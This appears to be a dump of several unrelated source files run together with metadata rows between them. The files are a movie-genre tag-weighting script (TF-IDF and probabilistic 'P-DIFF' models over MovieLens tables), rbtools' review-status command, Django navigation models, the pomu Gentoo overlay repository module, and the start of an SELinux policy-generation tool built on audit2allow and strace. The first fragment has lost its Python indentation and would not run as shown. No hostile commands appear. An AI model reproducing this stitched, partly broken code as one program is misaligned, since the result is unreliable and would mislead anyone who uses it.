data_dictionary_tf_genre2[key] = round((float(data_dictionary_tf_genre2[key]) / float(total_tag_newness_weight)),10)
data_dictionary_tf_idf_genre2[key] = round((float(log((total_movie_count/weighted_genre_movie_count[key]),2.71828))), 10)
data_dictionary_tf_idf_genre2[key] = round((data_dictionary_tf_genre2[key] * data_dictionary_tf_idf_genre2[key]), 10)
else:
data_dictionary_tf_genre2[key] = 0.0
#genre_model_value_tf_genre1 = sorted(data_dictionary_tf_genre1.items(), key=operator.itemgetter(1), reverse=True)
#genre_model_value_tfidf_genre2 = sorted(data_dictionary_tf_genre2.items(), key=operator.itemgetter(1), reverse=True)
#--------------------------------------------------------------------------------------------------------------
#Subtask-3 : Calculate the DIFF vector
#Manhattan distance is used since for high dimensions it works better. compared to higher order minkowski distance
diff_vector={}
#Makes more sense to have +ve 0, and -ve as it clearly states the difference, between genre1
#and genre2.
for key in data_dictionary_tf_idf_genre1:
if key in data_dictionary_tf_idf_genre2:
diff_vector[key] = data_dictionary_tf_idf_genre1[key] - data_dictionary_tf_idf_genre2[key]
else:
diff_vector[key] = data_dictionary_tf_idf_genre1[key]
for key in data_dictionary_tf_idf_genre2:
if key in diff_vector:
continue
else:
diff_vector[key] = 0 - data_dictionary_tf_idf_genre2[key]
cur2.execute("SELECT tag FROM `genome-tags`")
tagName = cur2.fetchall()
for keyVal in tagName:
key = keyVal[0]
if key in diff_vector:
continue;
else:
diff_vector[key] = 0.0
genre_diff = sorted(diff_vector.items(), key=operator.itemgetter(1), reverse=True)
#pprint.pprint(genre_model_value_tfidf_genre1)
#pprint.pprint(genre_model_value_tfidf_genre2)
pprint.pprint(genre_diff)
elif args.MODEL == "P-DIFF1" :
###############################
#MODEL = P-DIFF-1
###############################
# ===============================================================================
#Subtask-1: Calculate the number of movies for a given tag for genre1 and genre2
#and total movies in genre1
#================================================================================
dd_r1_genre1 = {}
dd_m1_genre2 = {}
M = total_movie_count #Movies in genre1 U genre2
cur2.execute("SELECT count(movieid) FROM `mlmovies_clean` where genres = %s",[args.GENRE1])
result1 = cur2.fetchone()
R = float(result1[0]) #Movies in genre1
#Calculation for genre1. r = movies in genre1 with tag t
cur2.execute("SELECT movieid FROM `mlmovies_clean` where genres = %s",[args.GENRE1])
result1 = cur2.fetchall()
for data1 in result1:
genre_movie_id = data1[0]
#Select distint tagIDs for the movieID
cur2.execute("SELECT tagid FROM mltags WHERE movieid = %s",[genre_movie_id])
result2 = cur2.fetchall()
for data2 in result2:
genre_tag_id = data2[0]
#Get the tag_name for the tagID.
cur2.execute("SELECT tag FROM `genome-tags` WHERE tagID = %s", [genre_tag_id])
result2_sub = cur2.fetchone()
tagName = result2_sub[0]
#For TF
if tagName in dd_r1_genre1:
dd_r1_genre1[tagName] = (dd_r1_genre1[tagName] + 1)
else:
dd_r1_genre1[tagName] = 1
#Calculation for m=movies in genre1 U genre 2 with tag t
cur2.execute("SELECT distinct(movieid) FROM `mlmovies_clean` where genres=%s || genres=%s",[args.GENRE1,args.GENRE2])
result1 = cur2.fetchall()
for data1 in result1:
genre_movie_id = data1[0]
#Select distint tagIDs for the movieID
cur2.execute("SELECT tagid FROM mltags WHERE movieid = %s",[genre_movie_id])
result2 = cur2.fetchall()
for data2 in result2:
genre_tag_id = data2[0]
#Get the tag_name for the tagID.
cur2.execute("SELECT tag FROM `genome-tags` WHERE tagID = %s", [genre_tag_id])
result2_sub = cur2.fetchone()
tagName = result2_sub[0]
#For TF
if tagName in dd_m1_genre2:
dd_m1_genre2[tagName] = (dd_m1_genre2[tagName] + 1)
else:
dd_m1_genre2[tagName] = 1
#print dd_r1_genre1
#print dd_m1_genre2
#Subtask:2 - Calculate the pdiff1 using the given formula
pdiff_wt_genre1={}
for tag in dd_m1_genre2:
r=0
if tag in dd_r1_genre1:
r = float(dd_r1_genre1[tag])
m = float(dd_m1_genre2[tag])
val1=0
val2=0
val3=0
val4=0
#r = 0 means that the tag never occurs for a genre.
#R=r means that the tag occurs for every movie of the genre, so its frequency is 1 and
#discriminating power is 0 . In both the scenarios, we ignore such a tag.
#m>= r always since its a union.
# Get the probability of the tag in M and add it to avoid edge cases- ref:Salton & buckley
p_tag = float(m / M)
#explain why you think square term comes in the picture.But as the max probability will be 1, the term does not make
#much difference for values less than 1.
val1 = float(float(r + p_tag)/(R-r+1))
val3 = float(float(r + p_tag)/(R + 1))
val2 = float((m-r+p_tag)/(M-m-R+r+1))
val4 = float((m-r+p_tag)/(M-R+1))
pdiff_wt_genre1[tag] = float(log(float(val1/val2),2)) * float(val3 - val4)
#Make weight of other tags to zero
cur2.execute("SELECT tag FROM `genome-tags`")
tagName = cur2.fetchall()
for keyval in tagName:
key = keyval[0]
if key in pdiff_wt_genre1:
continue
else:
pdiff_wt_genre1[key] = 0
pprint.pprint(sorted(pdiff_wt_genre1.items(), key=operator.itemgetter(1), reverse=True))
elif args.MODEL == "P-DIFF2":
###############################
#MODEL = P-DIFF-2
###############################
# ===============================================================================
#Subtask-1: Calculate the number of movies for a given tag for genre1 and genre2
#and total movies in genre2
#================================================================================
dd_r1_genre1 = {}
dd_m1_genre2 = {}
M = total_movie_count #Movies in genre1 U genre2
cur2.execute("SELECT count(movieid) FROM `mlmovies_clean` where genres = %s",[args.GENRE2])
result1 = cur2.fetchone()
R = float(result1[0]) #Movies in genre1
#Calculation for genre2. r = movies in genre2 without tag t. We first get the value of movies in genre2 with tag t then
#subtract that value from total movies there in genre2, for each tag
cur2.execute("SELECT movieid FROM `mlmovies_clean` where genres = %s",[args.GENRE2])
result1 = cur2.fetchall()
for data1 in result1:
genre_movie_id = data1[0]
#Select distint tagIDs for the movieID
cur2.execute("SELECT tagid FROM mltags WHERE movieid = %s",[genre_movie_id])
result2 = cur2.fetchall()
for data2 in result2:
genre_tag_id = data2[0]
#Get the tag_name for the tagID.
cur2.execute("SELECT tag FROM `genome-tags` WHERE tagID = %s", [genre_tag_id])
result2_sub = cur2.fetchone()
tagName = result2_sub[0]
#For TF
if tagName in dd_r1_genre1:
dd_r1_genre1[tagName] = (dd_r1_genre1[tagName] + 1)
else:
dd_r1_genre1[tagName] = 1
#Calculation for genre2. m=movies in genre1 U genre 2 without tag t. Subtract later from M to get movies in genre1 or genre2
#without a tag
cur2.execute("SELECT distinct(movieid) FROM `mlmovies_clean` where genres=%s || genres=%s",[args.GENRE1,args.GENRE2])
result1 = cur2.fetchall()
for data1 in result1:
genre_movie_id = data1[0]
#Select distint tagIDs for the movieID
cur2.execute("SELECT tagid FROM mltags WHERE movieid = %s",[genre_movie_id])
result2 = cur2.fetchall()
for data2 in result2:
genre_tag_id = data2[0]
#Get the tag_name for the tagID.
cur2.execute("SELECT tag FROM `genome-tags` WHERE tagID = %s", [genre_tag_id])
result2_sub = cur2.fetchone()
tagName = result2_sub[0]
#For TF
if tagName in dd_m1_genre2:
dd_m1_genre2[tagName] = (dd_m1_genre2[tagName] + 1)
else:
dd_m1_genre2[tagName] = 1
#Subtask:2 - Calculate the pdiff1 using the given formula
pdiff_wt_genre1={}
for tag in dd_m1_genre2:
r = R
if tag in dd_r1_genre1:
r = R - float(dd_r1_genre1[tag])
m = M - float(dd_m1_genre2[tag])
val1=0
val2=0
val3=0
val4=0
#r = 0 means that the tag never occurs for a genre.
#R=r means that the tag occurs for every movie of the genre, so its frequency is 1 and
#discriminating power is 0 . In both the scenarios, we ignore such a tag.
#m>= r always since its a union.
# Get the probability of the tag not in M and add it to avoid edge cases- ref:Salton & buckley
p_tag = float(m / M)
#explain why you think square term comes in the picture.But as the max probability will be 1, the term does not make
#much difference for values less than 1.
val1 = float(float(r + p_tag)/(R-r+1))
val3 = float(float(r + p_tag)/(R + 1))
val2 = float((m-r+p_tag)/(M-m-R+r+1))
val4 = float((m-r+p_tag)/(M-R+1))
pdiff_wt_genre1[tag] = float(log(float(val1/val2),2)) * (float(val3 - val4))
#Make weight of other tags to zero
cur2.execute("SELECT tag FROM `genome-tags`")
tagName = cur2.fetchall()
for keyval in tagName:
key = keyval[0]
if key in pdiff_wt_genre1:
continue
else:
pdiff_wt_genre1[key] = 0
pprint.pprint(sorted(pdiff_wt_genre1.items(), key=operator.itemgetter(1), reverse=True))
| gpl-3.0 | 3,274,444,029,248,706,600 | 33.875 | 133 | 0.578737 | false | 3.541044 | false | false | false |
brettdh/rbtools | rbtools/commands/status.py | 1 | 2506 | import logging
from rbtools.commands import Command, Option
from rbtools.utils.repository import get_repository_id
from rbtools.utils.users import get_username
class Status(Command):
"""Display review requests for the current repository."""
name = "status"
author = "The Review Board Project"
description = "Output a list of your pending review requests."
args = ""
option_list = [
Option("--all",
dest="all_repositories",
action="store_true",
default=False,
help="Show review requests for all repositories instead "
"of the detected repository."),
Command.server_options,
Command.repository_options,
Command.perforce_options,
]
def output_request(self, request):
print " r/%s - %s" % (request.id, request.summary)
def output_draft(self, request, draft):
print " * r/%s - %s" % (request.id, draft.summary)
def main(self):
repository_info, tool = self.initialize_scm_tool(
client_name=self.options.repository_type)
server_url = self.get_server_url(repository_info, tool)
api_client, api_root = self.get_api(server_url)
self.setup_tool(tool, api_root=api_root)
username = get_username(api_client, api_root, auth_required=True)
query_args = {
'from_user': username,
'status': 'pending',
'expand': 'draft',
}
if not self.options.all_repositories:
repo_id = get_repository_id(
repository_info,
api_root,
repository_name=self.options.repository_name)
if repo_id:
query_args['repository'] = repo_id
else:
logging.warning('The repository detected in the current '
'directory was not found on\n'
'the Review Board server. Displaying review '
'requests from all repositories.')
requests = api_root.get_review_requests(**query_args)
try:
while True:
for request in requests:
if request.draft:
self.output_draft(request, request.draft[0])
else:
self.output_request(request)
requests = requests.get_next(**query_args)
except StopIteration:
pass
| mit | 7,896,034,050,389,022,000 | 33.805556 | 77 | 0.553472 | false | 4.523466 | false | false | false |
mennanov/django-blueprint | project_name/apps/navigation/models.py | 1 | 1661 | # -*- coding: utf-8 -*-
from django.db import models
from django.utils.translation import ugettext_lazy as _
from mptt.models import TreeForeignKey, TreeManyToManyField, MPTTModel
class Navigation(models.Model):
"""
Navigation menu
"""
key = models.CharField(_(u'key'), max_length=32, help_text=_(u'This value is used in the code, do not touch it!'))
name = models.CharField(_(u'name'), max_length=70)
links = TreeManyToManyField('Link', verbose_name=_(u'links'), through='LinkMembership')
def __unicode__(self):
return self.name
class Meta:
verbose_name = _(u'navigation menu')
verbose_name_plural = _(u'navigation menus')
class Link(MPTTModel):
"""
Navigation link
"""
parent = TreeForeignKey('self', verbose_name=_(u'parent link'), null=True, blank=True)
name = models.CharField(_(u'name'), max_length=70, help_text=_(u'Name of the link in the menu'))
url = models.CharField(_(u'url'), max_length=255, help_text=_(u'Example: "/about/" or "/"'))
def __unicode__(self):
return self.name
def get_absolute_url(self):
return self.url
class Meta:
verbose_name = _(u'navigation link')
verbose_name_plural = _(u'navigation links')
class LinkMembership(models.Model):
"""
Link in navigation membership
"""
navigation = models.ForeignKey('Navigation')
link = TreeForeignKey('Link')
position = models.PositiveIntegerField(_(u'position'), default=0, db_index=True)
class Meta:
ordering = ['position']
verbose_name = _(u'link membership')
verbose_name_plural = _(u'link memberships') | gpl-2.0 | -8,933,735,953,260,462,000 | 30.358491 | 118 | 0.64118 | false | 3.862791 | false | false | false |
Hummer12007/pomu | pomu/repo/repo.py | 1 | 9456 | """Subroutines with repositories"""
from os import path, rmdir, makedirs
from shutil import copy2
from git import Repo
from patch import PatchSet
import portage
from pomu.package import Package, PatchList
from pomu.util.cache import cached
from pomu.util.fs import remove_file, strip_prefix
from pomu.util.result import Result
class Repository():
def __init__(self, root, name=None):
"""
Parameters:
root - root of the repository
name - name of the repository
"""
if not pomu_status(root):
raise ValueError('This path is not a valid pomu repository')
self.root = root
self.name = name
@property
def repo(self):
return Repo(self.root)
@property
def pomu_dir(self):
return path.join(self.root, 'metadata/pomu')
def merge(self, mergeable):
"""Merges a package or a patchset into the repository"""
if isinstance(mergeable, Package):
return self.merge_pkg(mergeable)
elif isinstance(mergeable, PatchList):
pkg = self.get_package(mergeable.name, mergeable.category,
mergeable.slot).unwrap()
return pkg.patch(mergeable.patches)
return Result.Err() #unreachable yet
def merge_pkg(self, package):
"""Merge a package (a pomu.package.Package package) into the repository"""
r = self.repo
pkgdir = path.join(self.pomu_dir, package.category, package.name)
if package.slot != '0':
pkgdir = path.join(pkgdir, package.slot)
package.merge_into(self.root).expect('Failed to merge package')
for wd, f in package.files:
r.index.add([path.join(wd, f)])
manifests = package.gen_manifests(self.root).expect()
for m in manifests:
r.index.add([m])
self.write_meta(pkgdir, package, manifests)
with open(path.join(self.pomu_dir, 'world'), 'a+') as f:
f.write('{}/{}'.format(package.category, package.name))
f.write('\n' if package.slot == '0' else ':{}\n'.format(package.slot))
r.index.add([path.join(self.pomu_dir, package.category, package.name)])
r.index.add([path.join(self.pomu_dir, 'world')])
r.index.commit('Merged package ' + package.name)
return Result.Ok('Merged package ' + package.name + ' successfully')
def write_meta(self, pkgdir, package, manifests):
"""
Write metadata for a Package object
Parameters:
pkgdir - destination directory
package - the package object
manifests - list of generated manifest files
"""
makedirs(pkgdir, exist_ok=True)
with open(path.join(pkgdir, 'FILES'), 'w+') as f:
for wd, fil in package.files:
f.write('{}/{}\n'.format(wd, fil))
for m in manifests:
f.write('{}\n'.format(strip_prefix(m, self.root)))
if package.patches:
patch_dir = path.join(pkgdir, 'patches')
makedirs(patch_dir, exist_ok=True)
with open(path.join(pkgdir, 'PATCH_ORDER'), 'w') as f:
for patch in package.patches:
copy2(patch, patch_dir)
f.write(path.basename(patch) + '\n')
if package.backend:
with open(path.join(pkgdir, 'BACKEND'), 'w+') as f:
f.write('{}\n'.format(package.backend.__cname__))
package.backend.write_meta(pkgdir)
with open(path.join(pkgdir, 'VERSION'), 'w+') as f:
f.write(package.version)
def unmerge(self, package):
"""Remove a package (by contents) from the repository"""
r = self.repo
for wd, f in package.files:
dst = path.join(self.root, wd)
remove_file(r, path.join(dst, f))
try:
rmdir(dst)
except OSError: pass
pf = path.join(self.pomu_dir, package.name)
if path.isfile(pf):
remove_file(r, pf)
r.commit('Removed package ' + package.name + ' successfully')
return Result.Ok('Removed package ' + package.name + ' successfully')
def remove_package(self, name):
"""Remove a package (by name) from the repository"""
pkg = self.get_package(name).expect()
return self.unmerge(pkg)
def update_package(self, category, name, new):
"""Updates a package, replacing it by a newer version"""
pkg = self.get_package(category, name).expect()
self.unmerge(pkg).expect()
self.merge(new)
def _get_package(self, category, name, slot='0'):
"""Get an existing package (by category, name and slot), reading the manifest"""
from pomu.source import dispatcher
if slot == '0':
pkgdir = path.join(self.pomu_dir, category, name)
else:
pkgdir = path.join(self.pomu_dir, category, name, slot)
backend = None
if path.exists(path.join(pkgdir, 'BACKEND')):
with open(path.join(pkgdir, 'BACKEND'), 'r') as f:
bname = f.readline().strip()
backend = dispatcher.backends[bname].from_meta_dir(pkgdir)
if backend.is_err():
return backend
backend = backend.ok()
with open(path.join(pkgdir, 'VERSION'), 'r') as f:
version = f.readline().strip()
with open(path.join(pkgdir, 'FILES'), 'r') as f:
files = [x.strip() for x in f]
patches=[]
if path.isfile(path.join(pkgdir, 'PATCH_ORDER')):
with open(path.join(pkgdir, 'PATCH_ORDER'), 'r') as f:
patches = [x.strip() for x in f]
pkg = Package(name, self.root, backend, category=category, version=version, slot=slot, files=files, patches=[path.join(pkgdir, 'patches', x) for x in patches])
pkg.__class__ = MergedPackage
return Result.Ok(pkg)
def get_package(self, name, category=None, slot=None):
"""Get a package by name, category and slot"""
with open(path.join(self.pomu_dir, 'world'), 'r') as f:
for spec in f:
spec = spec.strip()
cat, _, nam = spec.partition('/')
nam, _, slo = nam.partition(':')
if (not category or category == cat) and nam == name:
if not slot or (slot == '0' and not slo) or slot == slo:
return self._get_package(category, name, slot or '0')
return Result.Err('Package not found')
def get_packages(self):
with open(path.join(self.pomu_dir, 'world'), 'r') as f:
lines = [x.strip() for x in f.readlines() if x.strip() != '']
return lines
def portage_repos():
"""Yield the repositories configured for portage"""
rsets = portage.db[portage.root]['vartree'].settings.repositories
for repo in rsets.prepos_order:
yield repo
def portage_repo_path(repo):
"""Get the path of a given portage repository (repo)"""
rsets = portage.db[portage.root]['vartree'].settings.repositories
if repo in rsets.prepos:
return rsets.prepos[repo].location
return None
def pomu_status(repo_path):
"""Check if pomu is enabled for a repository at a given path (repo_path)"""
return path.isdir(path.join(repo_path, 'metadata', 'pomu'))
def pomu_active_portage_repo():
"""Returns a portage repo, for which pomu is enabled"""
for repo in portage_repos():
if pomu_status(portage_repo_path(repo)):
return repo
return None
@cached
def pomu_active_repo(no_portage=None, repo_path=None):
"""Returns a repo for which pomu is enabled"""
if no_portage:
if not repo_path:
return Result.Err('repo-path required')
if pomu_status(repo_path):
return Result.Ok(Repository(repo_path))
return Result.Err('pomu is not initialized')
else:
repo = pomu_active_portage_repo()
if repo:
return Result.Ok(Repository(portage_repo_path(repo), repo))
return Result.Err('pomu is not initialized')
class MergedPackage(Package):
@property
def pkgdir(self):
ret = path.join(self.root, 'metadata', 'pomu', self.category, self.name)
if self.slot != '0':
ret = path.join(ret, self.slot)
return ret
def patch(self, patch):
if isinstance(patch, list):
for x in patch:
self.patch(x)
return Result.Ok()
ps = PatchSet()
ps.parse(open(patch, 'r'))
ps.apply(root=self.root)
self.add_patch(patch)
return Result.Ok()
@property
def patch_list(self):
with open(path.join(self.pkgdir, 'PATCH_ORDER'), 'r') as f:
lines = [x.strip() for x in f.readlines() if x.strip() != '']
return lines
def add_patch(self, patch, name=None): # patch is a path, unless name is passed
patch_dir = path.join(self.pkgdir, 'patches')
makedirs(patch_dir, exist_ok=True)
if name is None:
copy2(patch, patch_dir)
with open(path.join(self.pkgdir, 'PATCH_ORDER'), 'w+') as f:
f.write(path.basename(patch) + '\n')
else:
with open(path.join(patch_dir, name), 'w') as f:
f.write(patch)
with open(path.join(self.pkgdir, 'PATCH_ORDER'), 'w+') as f:
f.write(name + '\n')
| gpl-2.0 | 5,766,960,781,250,393,000 | 38.07438 | 167 | 0.579315 | false | 3.702428 | false | false | false |
Siosm/contextd-capture | piga-systrans/selaudit/selaudit.py | 2 | 25513 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
# Configuration
# Templates
basepolname = 'template/module'
base_transpol_name = 'template/temp_transition'
makefile_path = 'template/Makefile'
# Default value for the template variables
user_u_default = 'user_u'
user_r_default = 'user_r'
user_t_default = 'user_t'
module_domain_t_default_pattern = 'user_%modulename%_t'
module_exec_t_default_pattern = '%modulename%_exec_t'
module_tmp_domain_t_default_pattern = '%modulename%_tmp_t'
module_log_domain_t_default_pattern = '%modulename%_log_t'
# Selpolgen user
selpolgen_u_default = 'root'
selpolgen_r_default = 'sysadm_r'
selpolgen_t_default = 'sysadm_t'
# Programs fullpath
semodule_path = '/usr/sbin/semodule'
make_path = '/usr/bin/make'
setfilecon_path = '/usr/sbin/setfilecon'
runcon_path = '/usr/bin/runcon'
audit2allow_path = '/usr/bin/audit2allow'
dmesg_path = '/bin/dmesg'
strace_path = '/usr/bin/strace'
ls_path = '/bin/ls'
setfiles_path = '/sbin/setfiles'
# /Configuration
# Import
import getopt
import re, string, sys
import os, signal
import glob
import subprocess
import shutil
import time
from pigi import *
# Global variables
verbosity = 0
wantToAbort = False
# functions
def log(priority, msg):
if priority <= verbosity:
print(msg)
def handler(signum, frame):
global wantToAbort
wantToAbort = True
def mkdir_p(path):
if not os.path.exists (path):
os.makedirs (path)
def getPolicyPath(module_name, extension=''):
if len(extension) > 0:
return "policies/%s/%s.%s" % (module_name, module_name, extension)
else:
return "policies/%s/" % module_name
def getTempModuleTransitionPath(module_name, extension=''):
if len(extension) > 0:
return "temp/%s/%s.%s" % (module_name, module_name, extension)
else:
return "temp/%s/" % module_name
def loadSELinuxModule(module_path_pp):
proc = subprocess.Popen([semodule_path, '-i', module_path_pp], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout,stderr = proc.communicate()
if proc.returncode != 0:
print("----\nError while loading the SELinux module '%s':\n<stdout>%s</stdout>\n<stderr>%s</stderr>\n----" % (module_path_pp, stdout, stderr), file=sys.stderr)
return False
else:
return True
def unloadSELinuxModule(module_name):
proc = subprocess.Popen([semodule_path, '-r', module_name], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout,stderr = proc.communicate()
if proc.returncode != 0:
print("----\nError while unloading the SELinux module '%s':\n<stdout>%s</stdout>\n<stderr>%s</stderr>\n----" % (module_name, stdout, stderr), file=sys.stderr)
return False
else:
return True
def reloadSELinuxModule(module_name):
if unloadSELinuxModule(module_name):
if loadSELinuxModule(getPolicyPath(module_name, "pp")):
return True
else:
return False
else:
return False
def compileAndLoadSELinuxModule(module_dir):
proc = subprocess.Popen([make_path, 'load'], cwd=module_dir, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout,stderr = proc.communicate()
if proc.returncode != 0:
print("----\nError while compiling and loading the module at '%s':\n<stdout>%s</stdout>\n<stderr>%s</stderr>\n----" % (module_dir, stdout, stderr), file=sys.stderr)
return False
else:
return True
def generateBasePolicy(module_name, app_path, module_domain_t, module_tmp_domain_t, module_log_domain_t, module_exec_t, user_u, user_r, user_t, permissive_mode=False):
#TODO add exceptions handling. It's fine for the moment as these exceptions are fatal for the program
# Get the template
template_te = open("%s.te" % basepolname, "r").read()
template_if = open("%s.if" % basepolname, "r").read()
template_fc = open("%s.fc" % basepolname, "r").read()
if len(template_te) == 0:
return ''
if permissive_mode:
template_te += "permissive ${module_domain_t};"
# Replace the template variables by our values
dico=dict({"module": module_name, "app_path": app_path, "module_domain_t": module_domain_t, "module_tmp_domain_t": module_tmp_domain_t, "module_log_domain_t": module_log_domain_t, "module_exec_t": module_exec_t, "user_u": user_u, "user_r": user_r, "user_t": user_t})
for key in dico.keys():
template_te=template_te.replace("${%s}" % key, dico[key])
template_if=template_if.replace("${%s}" % key, dico[key])
template_fc=template_fc.replace("${%s}" % key, dico[key])
# Create a directory for the output module
mkdir_p(getPolicyPath(module_name, ""))
# write the output module there
file_te = open(getPolicyPath(module_name, "te"), "w").write(template_te)
file_if = open(getPolicyPath(module_name, "if"), "w").write(template_if)
file_fc = open(getPolicyPath(module_name, "fc"), "w").write(template_fc)
# Copy the Makefile
shutil.copyfile(makefile_path, "%sMakefile" % getPolicyPath(module_name, ""))
return getPolicyPath(module_name)
def generateAuditPolicy(module_name, app_path, module_domain_t, module_exec_t, user_u, user_r, user_t):
#TODO add exceptions handling. It's fine for the moment as these exceptions are fatal for the program
module_name = "selpolgen-%s" % module_name
# Get the template
template_te = open("%s.te" % base_transpol_name, "r").read()
template_if = open("%s.if" % base_transpol_name, "r").read()
template_fc = open("%s.fc" % base_transpol_name, "r").read()
if len(template_te) == 0:
return ''
# Replace the template variables by our values
dico=dict({"module": module_name, "app_path": app_path, "module_domain_t": module_domain_t, "module_exec_t": module_exec_t, "user_u": user_u, "user_r": user_r, "user_t": user_t})
for key in dico.keys():
template_te=template_te.replace("${%s}" % key, dico[key])
template_if=template_if.replace("${%s}" % key, dico[key])
template_fc=template_fc.replace("${%s}" % key, dico[key])
# Remove the directory for the output module
try:
shutil.rmtree(getTempModuleTransitionPath(module_name, ""))
except:
pass
# Create a directory for the output module
mkdir_p(getTempModuleTransitionPath(module_name, ""))
# write the output module there
file_te = open(getTempModuleTransitionPath(module_name, "te"), "w").write(template_te)
file_if = open(getTempModuleTransitionPath(module_name, "if"), "w").write(template_if)
file_fc = open(getTempModuleTransitionPath(module_name, "fc"), "w").write(template_fc)
# Copy the Makefile
shutil.copyfile(makefile_path, "%sMakefile" % getTempModuleTransitionPath(module_name, ""))
return getTempModuleTransitionPath(module_name)
def setFileSELinuxContext(user_u, role_r, type_t, filepath):
context = '%s:%s:%s' % (user_u, role_r, type_t)
proc = subprocess.Popen([setfilecon_path, context, filepath], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout,stderr = proc.communicate()
if proc.returncode != 0:
print("Error while setting the context %s to the file '%s':\n<stdout>%s</stdout>\n<stderr>%s</stderr>" % (context, filepath, stdout, stderr), file=sys.stderr)
return False
else:
return True
def getAudit2AllowRules(domain_t):
rules = []
proc = subprocess.Popen([audit2allow_path, "-d"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout,stderr = proc.communicate()
if proc.returncode != 0:
print("Error while auditing:\n<stdout>%s</stdout>\n<stderr>%s</stderr>" % (stdout, stderr), file=sys.stderr)
return rules
lines=stdout.splitlines()
log(2, "audit2allow output (%i lines) is: '%s'" % (len(lines), stdout))
store=False
for line in lines:
line = line.decode()
log(2, "line[:10] = '%s'" % (line[:10]))
if line[:10] == "#=========":
fields=line.split(" ")
if fields[1] == domain_t:
store = True
else:
store = False
else:
if store and len(line)>0:
rules.append(line);
return rules
def regeneratePolicy(policy_path, rules, permissive_domains = list()):
# Add the lines to the policy
template_te = open(policy_path, "a");
#template_te.writelines(rules)
for line in rules:
template_te.write(line+"\n")
template_te.close()
# Parse it
scanner = SELinuxScanner()
parser = SELinuxParser(scanner)
te_file = open(policy_path, "r")
tokens = parser.parse(te_file.read())
te_file.close()
# Store it optimized
optimizer = SELinuxOptimizer(tokens)
optimizer.selfize_rules()
optimizer.factorize_rules()
optimizer.factorize_rule_attributes()
optimizer.sort_rules()
optimizer.to_file(policy_path, permissive_domains)
def updateAndReloadRules(module_name, module_domain_t, enforcingMode = True, forceReload=False):
log(1, "Read the audit2allow output")
rules = getAudit2AllowRules(module_domain_t)
if forceReload or len(rules) > 0:
log(0, "Add %i rules to %s and reload the policy" % (len(rules), getPolicyPath(module_name, "te")))
if not enforcingMode:
permissive_domains = [module_domain_t]
else:
permissive_domains = list()
regeneratePolicy(getPolicyPath(module_name, "te"), rules, permissive_domains)
# empty the logs
dmesg = subprocess.Popen([dmesg_path, '-c'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
dmesg.communicate()
# Load the new policy
compileAndLoadSELinuxModule(getPolicyPath(module_name, ""))
return len(rules)
def runApp(module_name, app_path, useStrace=False):
if useStrace and os.path.exists(strace_path):
print("Launch the application and trace it with strace")
proc = subprocess.Popen([strace_path, '-e' 'trace=open,execve,mkdir', '-o', "%sstrace" % getTempModuleTransitionPath("selpolgen-%s" % module_name, ""), '-ff', '-F', app_path])
else:
print("Launch the application")
proc = subprocess.Popen([app_path])
# get the pid
curPID = proc.pid
return proc
def askToRunApp(app_path, domain_t, audit_fc=False):
deleteFileList(["/tmp/selinux-audit"])
print("\n****** Entering the auditing loop ******")
if audit_fc:
print("The application you are auditing will first be launched in a permissive mode, be sure to use all the functionnalities before quitting it.\n")
print("Please launch this command in the domain %s: %s" % (domain_t, "selaudit_user.sh %s" % app_path))
def getFileCon(filepath):
proc = subprocess.Popen([ls_path, '-Z', filepath], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout,stderr = proc.communicate()
if proc.returncode != 0:
# print("Error while getting the context of the file '%s':\n<stdout>%s</stdout>\n<stderr>%s</stderr>" % (filepath, stdout, stderr), file=sys.stderr)
return "<Context not found>"
fields = str(stdout, "utf-8").split(' ')
log(2, "getFileCon('%s') = '%s'" % (filepath, fields[0]))
return fields[0]
def deleteFileList(to_be_deleted):
for f in to_be_deleted:
try:
if os.path.isfile(f) or os.path.islink(f):
os.remove(f)
elif os.path.isdir(f):
shutil.rmtree(f)
except Exception as inst:
print("deleteFileList: Caught exception %s: %s" % (type(inst), inst))
pass
def escape_re(re):
re = re.replace(".", "\\.");
re = re.replace("(", "\\)");
re = re.replace(")", "\\)");
re = re.replace("|", "\\|");
re = re.replace("^", "\\^");
re = re.replace("*", "\\*");
re = re.replace("+", "\\+");
re = re.replace("?", "\\?");
return re
def auditStraceLogs(module_name, dir_path="/tmp/selinux-audit/", saveResults=True):
# dir_path = getTempModuleTransitionPath("selpolgen-%s" % module_name, "")
execves = dict()
mkdirs = dict()
opens = dict()
libs = dict()
shms = dict()
failed = list()
to_be_deleted = list()
# Read all the logs
log_files = glob.glob("%s/strace*" % dir_path)
for log in log_files:
f = open(log, "r")
for line in f:
m = re.match(r"(?P<function>\w+) *\((?P<params>.*)\) *= *(?P<result>.*)", line)
if m:
args = m.group('params').split(', ')
if not m.group('result').startswith("-1"):
line = "%s(%s)" % (m.group('function'), ','.join(args))
m2 = re.match(r"\"(.*)\"", args[0])
if m2:
filepath = m2.group(1)
if m.group('function') == "open":
if args[1].find('O_CREAT') != -1 or args[1].find('O_WRONLY') != -1:
to_be_deleted.append(filepath)
# Is the file a standard library ?
stdlib = re.match(r"/(usr/)?lib/[^/]+", filepath)
if filepath.startswith('/dev/shm'):
if filepath not in shms:
shms[filepath] = list()
if line not in shms[filepath]:
shms[filepath].append(line)
elif stdlib:
if filepath not in opens:
libs[filepath] = list()
if line not in libs[filepath]:
libs[filepath].append(line)
else:
if filepath not in opens:
opens[filepath] = list()
if line not in opens[filepath]:
opens[filepath].append(line)
elif m.group('function') == "mkdir":
if filepath not in mkdirs:
mkdirs[filepath] = list()
if line not in mkdirs[filepath]:
mkdirs[filepath].append(line)
to_be_deleted.append(filepath)
elif m.group('function') == "execve":
if filepath not in execves:
execves[filepath] = list()
if line not in execves[filepath]:
execves[filepath].append(line)
else:
line = "%s(%s)" % (m.group('function'), ','.join(args))
f.close()
# Delete all the strace files
deleteFileList(log_files);
if saveResults:
# We have the logs, sorted by type and by path, generate the output file
fc_file = open(getPolicyPath(module_name, "fc"), "a")
fc_file.write("\n\n\n# **** Mkdir ****\n")
mkdir_keys = mkdirs.keys()
for dir_path in sorted(mkdir_keys):
# Write all the interactions with this file
for call in mkdirs[dir_path]:
fc_file.write("# %s\n" % call)
# Propose a rule
fc_file.write("#%s/(.*/)? %s\n\n" % (escape_re(dir_path), getFileCon(dir_path)))
fc_file.write("\n\n\n# **** Execve ****\n")
